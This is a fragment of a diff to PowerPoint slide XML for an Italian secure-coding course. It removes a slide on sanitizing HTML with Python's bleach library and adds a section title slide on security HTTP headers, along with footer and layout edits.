-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Soluzione: bleach (Python) — sanitization</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t/>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>from bleach import clean</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>safe = clean(input, tags=['p','b','i','a'],</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>             attributes={'a':['href']},</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>             protocols=['http','https'])</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t/>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Mantiene &lt;b&gt;&lt;i&gt;&lt;p&gt;&lt;a&gt;, rimuove &lt;script&gt;, attributi javascript:</a:t>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="2000" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="6FD8E0"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>PARTE</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="TextBox 6"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4572000" y="2286000"/>
+            <a:ext cx="7315200" cy="1645920"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="4400" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="0F2D52"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>Header HTTP di sicurezza</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="TextBox 7"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4572000" y="3931920"/>
+            <a:ext cx="7315200" cy="1828800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="1800" b="0" i="1">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>Configurazione rapida, difese potenti</a:t>
             </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:cxnSp>
         <p:nvCxnSpPr>
-          <p:cNvPr id="5" name="Connector 4"/>
+          <p:cNvPr id="9" name="Connector 8"/>
           <p:cNvCxnSpPr/>
           <p:nvPr/>
         </p:nvCxnSpPr>
@@ -8980,14 +11297,14 @@
       </p:cxnSp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="6" name="TextBox 5"/>
+          <p:cNvPr id="10" name="TextBox 9"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="6473952"/>
-            <a:ext cx="7315200" cy="320040"/>
+            <a:ext cx="7315200" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -9008,21 +11325,21 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="TextBox 6"/>
+              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi · 2024/2025</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="TextBox 10"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="10515600" y="6473952"/>
-            <a:ext cx="1188720" cy="320040"/>
+            <a:ext cx="1188720" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
